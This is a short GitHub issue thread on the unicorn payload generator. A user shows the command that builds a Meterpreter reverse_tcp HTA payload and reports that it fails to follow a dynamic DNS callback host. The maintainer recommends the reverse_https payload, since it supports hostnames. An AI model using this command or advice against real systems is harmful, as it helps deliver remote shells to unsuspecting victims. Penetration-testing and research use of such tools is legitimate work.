### ISSUE TITLE
Dns Resolve fails.

### ISSUE THREAD

**Issue by 0xyg3n** [trustedsec/unicorn#30]
Hello ,

i admire your work and good work you've done here ! i am using unicorn for a long time , and i realised that i have a problem , i don't know what's wrong with it but i think i can report it here and you might be able to fix it , well the issue is simple i am generating a payload like this:

python unicorn.py windows/meterpreter/reverse_tcp HOST PORT hta . 

i have my file generated and it works like a charm , but i am using a DNS as a host so it can resovle to my dynamic Ip address , the problem is that if my ip address changes , the DNS normally without any problems resovle the new one ! but ! we have a problem the HTA file doesn't resolve the new ip address from the DNS , which currently it should because the DNS has been updated , but the script doesn't!!

Please fix it :)

**Comment by trustedsec** [comment]
You can't use hostname with Reverse TCP - you need to specify the reverse_https as a payload. That supports hostnames. Would heavily recommend switching to reverse_https regardless :)

**Comment by 0xyg3n** [comment]
Thank you so much 👍
